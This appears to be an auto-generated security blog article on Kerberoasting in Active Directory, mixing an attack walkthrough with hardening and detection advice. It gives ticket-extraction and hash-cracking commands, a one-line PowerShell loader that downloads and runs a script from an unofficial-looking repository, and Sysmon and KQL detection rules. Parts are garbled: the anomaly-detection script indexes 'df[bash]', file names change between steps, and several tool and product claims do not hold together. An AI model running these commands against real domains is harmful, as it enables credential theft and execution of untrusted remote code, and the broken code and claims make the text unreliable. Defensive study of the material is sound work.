Listen to this Post

Introduction:
Kerberoasting is a post-exploitation attack that targets service accounts in Active Directory, allowing any domain-authenticated user to request a service ticket (TGS) for any service and crack it offline. Unlike other attacks, Kerberoasting generates no anomalous event ID 4769 spikes if done carefully, bypassing most endpoint detection and response (EDR) solutions. This article dissects the attack from enumeration to offline cracking on Linux and Windows, then provides hardened configurations, detection rules, and AI-driven log analysis techniques.
Learning Objectives:
- Execute a full Kerberoasting attack chain using Impacket, Rubeus, and hashcat.
- Identify vulnerable service accounts via LDAP enumeration and PowerShell.
- Implement detection mechanisms including Windows Event Tracing and SIEM queries, plus AI-based anomaly detection.
You Should Know:
- Enumeration & Ticket Extraction – Step by Step
Kerberoasting begins with identifying accounts that have Service Principal Names (SPNs) and weak encryption (RC4_HMAC). Below are verified commands for Linux and Windows.
Linux with Impacket (Python3):
Install Impacket pip3 install impacket Enumerate SPNs and request TGS tickets impacket-GetUserSPNs -request -dc-ip 192.168.1.10 domain.local/standarduser -outputfile kerb_tickets.txt
Windows with Rubeus (Compiled C):
Download Rubeus (from GhostPack)
iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/r3motecontrol/GhostPack/master/Rubeus/Rubeus.ps1")
Request all TGS tickets with RC4 encryption
Rubeus.exe kerberoast /outfile:hash.txt /rc4opsec
What does this do? These tools query Active Directory for accounts with SPNs (e.g., MSSQLSvc, HTTP, CIFS). For each result, they request a service ticket encrypted with the service account’s NTLM hash. The ticket is exported in a crackable format (HashCat mode 13100).
Pro tip: Limit ticket requests to accounts with `admincount=1` (privileged) by filtering with LDAP filter (&(servicePrincipalName=)(adminCount=1)).
2. Offline Cracking – Hashcat & John
Once you have the hash file, cracking reveals the plaintext password. Most service accounts use weak passwords.
Hashcat (Linux):
Using rockyou wordlist with rules hashcat -m 13100 -a 0 kerb_hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force For GPU optimization hashcat -m 13100 -a 3 kerb_hash.txt ?l?l?l?l?d?d?d?d -i --increment-min=8
John the Ripper (Windows – Cygwin/Msys2):
.\john.exe --format=krb5tgs --wordlist=rockyou.txt hash.txt
Why RC4 is dangerous: Even if AES encryption is enabled, the attacker can force RC4 by omitting the `-aes` flag in Rubeus or using `-enctype RC4` in Impacket. Mitigation is to disable RC4 for Kerberos entirely (Group Policy: Network security: Configure encryption types allowed for Kerberos).
- Hardening Against Kerberoasting – Group Policy & PowerShell
Prevent the attack by eliminating weak service accounts and enforcing AES.
Disable RC4 via GPO:
- Open Group Policy Management → Edit Default Domain Policy
- Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options
- Set `Network security: Configure encryption types allowed for Kerberos` → Check only `AES128_HMAC_SHA1` and `AES256_HMAC_SHA1`
Find and remediate vulnerable accounts (PowerShell as Domain Admin):
List all accounts with SPNs and RC4 support Get-ADUser -Filter {ServicePrincipalName -like ""} -Properties ServicePrincipalName,msDS-SupportedEncryptionTypes | Where-Object {$_.msDS-SupportedEncryptionTypes -ne 24} | Select-Object Name, ServicePrincipalName Disable RC4 for a specific service account Set-ADUser -Identity svc_sql -Replace @{'msDS-SupportedEncryptionTypes'=24}
Create managed service accounts (gMSA): They have automatic password rotation (every 30 days) and no user interactive logon.
New-ADServiceAccount -Name gMSA_SQL -DNSHostName sql.domain.local -ServicePrincipalNames "MSSQLSvc/sql.domain.local"
4. Detection via Windows Event Logs & Sysmon
Kerberoasting leaves traces, but they can be subtle. Monitor for unusual TGS requests.
Event IDs to collect:
– `4769` (Kerberos service ticket request) – look for `Ticket Encryption Type` = `0x17` (RC4) and a high volume of requests from a single user within 5 minutes.
– `5136` (Directory service change) – monitor if someone adds SPNs to low-privileged accounts (a privilege escalation trick).
Sysmon config to capture process creation for Rubeus/Impacket:
<Sysmon> <EventFiltering> <ProcessCreate onmatch="include"> <CommandLine condition="contains">Rubeus.exe</CommandLine> <CommandLine condition="contains">kerberoast</CommandLine> </ProcessCreate> </EventFiltering> </Sysmon>
KQL query for Sentinel/Splunk:
EventID=4769 | where TicketEncryptionType == "0x17" | summarize RequestCount=count() by AccountName, TargetServiceName, bin(TimeGenerated, 5m) | where RequestCount > 10
5. AI-Powered Anomaly Detection for Kerberoasting
Traditional rules miss low-and-slow attacks. Use machine learning on metadata.
Feature engineering for isolation forest:
- Number of unique SPNs requested per user per hour
- Entropy of target service names (random-looking SPNs are suspicious)
- Time-of-day deviation (service account requests at 3 AM)
Python script using scikit-learn (to be run on SIEM data):
import pandas as pd
from sklearn.ensemble import IsolationForest
df = pd.read_csv('kerberos_events.csv')
features = ['ticket_count_5min', 'unique_spns', 'entropy_tgt']
model = IsolationForest(contamination=0.01)
df['anomaly'] = model.fit_predict(df[bash])
anomalies = df[df['anomaly'] == -1]
print(f"Potential Kerberoasting: {len(anomalies)} events")
Deploy as a scheduled Azure Function or Lambda to trigger alerts when an anomaly score exceeds threshold.
6. Purple Team Simulation – Safe Testing
Before adversaries exploit you, test your own detections.
Using Invoke-Kerberoast (PowerShell Empire legacy – but works):
Import-Module .\Invoke-Kerberoast.ps1 Invoke-Kerberoast -OutputFormat Hashcat | Out-File -FilePath hashes.txt
Atomic Red Team test (T1558.003):
Install Atomic Red Team IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Invoke-AtomicRedTeam.ps1') Invoke-AtomicTest T1558.003 -TestNumbers 1
Expected output: Your EDR should generate an alert. If not, revisit detection logic.
What Undercode Say:
- Key Takeaway 1: Kerberoasting remains the 1 AD attack vector because organizations neglect service account hygiene and still allow RC4.
- Key Takeaway 2: AI-based behavioral detection catches what static rules miss – low volume, high entropy SPN requests from a legitimate user context.
Analysis: The “Pic of the Day” from Hacking Articles likely depicted a Kerberoasting workflow – a visual reminder that perfect defense requires both configuration (disable RC4, use gMSA) and active monitoring (4769 anomalies). Most blue teams focus on LSASS memory dumping while ignoring Kerberos, but offline cracking of service tickets does not require admin rights. Red teams love it because it’s silent: no process injection, no LSASS access, just native Kerberos requests. Mitigations are simple but often skipped because legacy applications may break when RC4 is disabled. The real solution is a phased approach: identify all accounts using RC4, migrate them to AES or gMSA within a 90-day window, then enforce the GPO. Meanwhile, deploy the AI anomaly detector as a compensating control. Without these steps, assume any domain user can compromise your Tier 0 within hours.
Prediction:
As EDRs improve their kernel-level visibility, Kerberoasting will evolve to use session tickets and delegation abuse (S4U2Self). Attackers will start combining Resource-Based Constrained Delegation (RBCD) with Kerberoasted credentials to achieve domain dominance in under 10 minutes. Microsoft will likely deprecate RC4 entirely in a future Windows Server release, but legacy application vendors will resist, creating a 3-5 year window of hybrid mitigations. AI-driven detection will become the standard, with SIEM vendors embedding unsupervised learning for Kerberos traffic. However, the most effective defense will remain boring: a quarterly service account password rotation policy enforced by automated tools like Azure AD Connect Health. The “Pic of the Day” is a wake-up call – act now before the silent ticketholder becomes your next breach headline.
▶️ Related Video (74% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Infosec Cybersecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


